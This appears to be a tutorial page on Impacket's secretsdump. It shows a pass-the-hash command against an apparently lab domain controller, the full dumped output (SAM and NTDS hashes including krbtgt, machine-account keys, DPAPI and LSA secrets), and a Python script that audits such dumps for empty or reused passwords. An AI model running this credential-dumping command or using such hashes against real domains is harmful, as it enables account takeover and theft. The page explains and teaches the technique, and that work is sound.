Impacket-secretsdump is a widely used tool in information security and penetration testing, and it is part of the Impacket suite. Impacket is a collection of Python classes for working with network protocols. secretsdump.py is a script in that collection that extracts password hashes, Kerberos tickets and other secrets from Windows systems. It is especially useful for extracting credentials when you have access to a Windows domain controller.
kali@kali=> impacket-secretsdump -debug -dc-ip 3.14.245.175 admin@spartancybersec.corp -hashes :64fbae31cc352fc26af97cbdef151e03
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x6819873eadf71f0789285138af013772
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC
SPARTANCYBERSEC\FIRST-DC$:aes256-cts-hmac-sha1-96:80e764f61ab3cb7fedc4fa0dcc2ae4346b9d86dce406bd0ef6dd171cf1a6b9e4
SPARTANCYBERSEC\FIRST-DC$:aes128-cts-hmac-sha1-96:e4a31fc1ad85640ff2b38263ab9a0bf4
SPARTANCYBERSEC\FIRST-DC$:des-cbc-md5:dc7acb5dd5832920
SPARTANCYBERSEC\FIRST-DC$:plain_password_hex:54ad56e5e0baa13e00c67a093b522c4fbf40c72dbc269b7274ba8c4e15e2c9bfd8f9fe3e476d6ceccc2ba2b22095003aa032b10d349836c8706574b11a003360a371082b6553f00aebce61c9d03b9e1db6433eed00c06bf7f6aecf6e998412fe8c6f5be2567cdfdab688d8342102c075e57e15a7d13732b6c9a974c9b29d47b9c7cb2958a9cdf18bcfff20329f953d0cbc32574dcf024c9c3307621dd56305d421b0c6d0e9e454d10bf079117e29cfe1b00037acec3bdeb2b73b1ee8282118346c13e03f93e051742bbebf21abd46920e48432c50f39d674328c767ebb417df8b37a0c61c1aaeafad9613b9621fe3d5c
SPARTANCYBERSEC\FIRST-DC$:aad3b435b51404eeaad3b435b51404ee:9e24232fd09fa4eb1fdf798597550a40:::
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM
dpapi_machinekey:0x982b8349b7df992ee7c56f20e44f5d151329b6c9
dpapi_userkey:0x3d4de8cb3f5353a1aad075f43682ed753d115a18
[+] Looking into NL$KM
[*] NL$KM
 0000 8D D2 8E 67 54 58 89 B1 C9 53 B9 5B 46 A2 B3 66 ...gTX...S.[F..f
 0010 D4 3B 95 80 92 7D 67 78 B7 1D F9 2D A5 55 B7 A3 .;...}gx...-.U..
 0020 61 AA 4D 86 95 85 43 86 E3 12 9E C4 91 CF 9A 5B a.M...C........[
 0030 D8 BB 0D AE FA D3 41 E0 D8 66 3D 19 75 A2 D1 B2 ......A..f=.u...
NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_uAKYyEam
[+] Calling DRSCrackNames for S-1-5-21-1861162130-2580302541-221646211-500
[+] Calling DRSGetNCChanges for {7c1a3d96-7ad9-44a1-a35f-3d06f3fec301}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=spartancybersec,DC=corp
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c90fb8ae170b856da331fa40d5c11769:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b44daa015f201fa31126895ebbcbbcab:::
admin:1008:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
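For reviewing a dump like the one above after an authorized assessment, the following added example (not part of the original page or of Impacket) parses the `uid:rid:lmhash:nthash` lines and reports empty passwords, stored LM hashes and accounts that share a password. The function names `parse` and `audit` and the report keys are assumptions made for this illustration; the sample lines are copied from the output on this page.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
# Section headers as they appear in the output on this page.
SECTIONS = {"[*] Dumping local SAM hashes": "SAM",
            "[*] Dumping Domain Credentials": "NTDS"}
# uid:rid:lmhash:nthash::: (the machine-account line in LSA secrets has no RID)
ENTRY = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$")

def parse(text):
    """Yield (source, user, lm, nt) for each SAM/NTDS account line (hypothetical helper)."""
    source = None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[*] Dumping"):
            source = next((v for k, v in SECTIONS.items() if line.startswith(k)), None)
        m = ENTRY.match(line)
        if m and source:
            yield source, m[1], m[3], m[4]

def audit(text):
    """Flag empty passwords, stored LM hashes and NT hashes shared between accounts."""
    by_nt = defaultdict(list)
    report = {"empty_password": [], "lm_stored": []}
    for source, user, lm, nt in parse(text):
        name = f"{source}/{user}"
        if nt == EMPTY_NT:
            report["empty_password"].append(name)
        else:
            by_nt[nt].append(name)  # identical NT hash means identical password
        if lm != EMPTY_LM:
            report["lm_stored"].append(name)
    # Report account names only, never the hashes themselves.
    report["shared_password"] = [names for names in by_nt.values() if len(names) > 1]
    return report

# Account lines copied from the output on this page.
SAMPLE = r"""[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping LSA Secrets
SPARTANCYBERSEC\FIRST-DC$:aad3b435b51404eeaad3b435b51404ee:9e24232fd09fa4eb1fdf798597550a40:::
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c90fb8ae170b856da331fa40d5c11769:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b44daa015f201fa31126895ebbcbbcab:::
admin:1008:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
"""
```

On this page's output the report shows that the local SAM `Administrator` account and the domain account `admin` have the same NT hash, which means both use the same password.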